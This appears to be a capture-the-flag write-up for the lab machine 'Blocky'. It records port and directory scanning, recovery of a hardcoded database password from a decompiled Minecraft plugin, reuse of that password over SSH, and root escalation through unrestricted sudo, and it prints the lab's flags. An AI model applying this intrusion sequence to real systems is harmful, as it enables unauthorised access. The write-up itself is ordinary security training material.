
Blocky: Vulnerabilities: Exposed sensitive files, reusable credentials, escalated privileges for user account


Enumeration:
sudo nmap -sC -sV -p- --min-rate=1000 10.129.83.185

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp?
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo 10.129.83.185 blocky.htb | sudo tee -a /etc/hosts


└──╼ [★]$ ftp 10.129.83.185
Connected to 10.129.83.185.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.83.185]



http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/ 

This is a page that lets us leave a reply involving comment and name

POST /wp-comments-post.php HTTP/1.1
Host: blocky.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://blocky.htb
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

comment=hello&author=heem&email=heem%40gmail.com&url=heem&submit=Post+Comment&comment_post_ID=5&comment_parent=0

gobuster dir -u http://blocky.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Starting gobuster in directory enumeration mode
===============================================================
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/server-status        (Status: 403) [Size: 298]
Progress: 220560 / 220561 (100.00%)

If we go to http://blocky.htb/plugins/ , we see two jar files called blockycore.jar and griefpreventation-

└──╼ [★]$ file BlockyCore.class 
BlockyCore.class: compiled Java class data, version 52.0 (Java 1.8)

 java -jar jd-gui-1.6.6.jar 

Using the jd-gui to compile the blockycore.class java code:
package com.myfirstplugin;

public class BlockyCore {
  public String sqlHost = "localhost";
  
  public String sqlUser = "root";
  
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
  
  public void onServerStart() {}
  
  public void onServerStop() {}
  
  public void onPlayerJoin() {
    sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
  }
  
  public void sendMessage(String username, String message) {}
}


ssh notch@10.129.83.185

notch@Blocky:~$ cat user.txt
059eccc48fac35ea998b1c748a773ef6

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL


Given that notch can run all commands  as sudo:

notch@Blocky:~$ sudo /bin/bash
root@Blocky:~# whoami
root

root@Blocky:/root# cat root.txt
43157bb36172192fe558c3e17108a368

Now we have root access
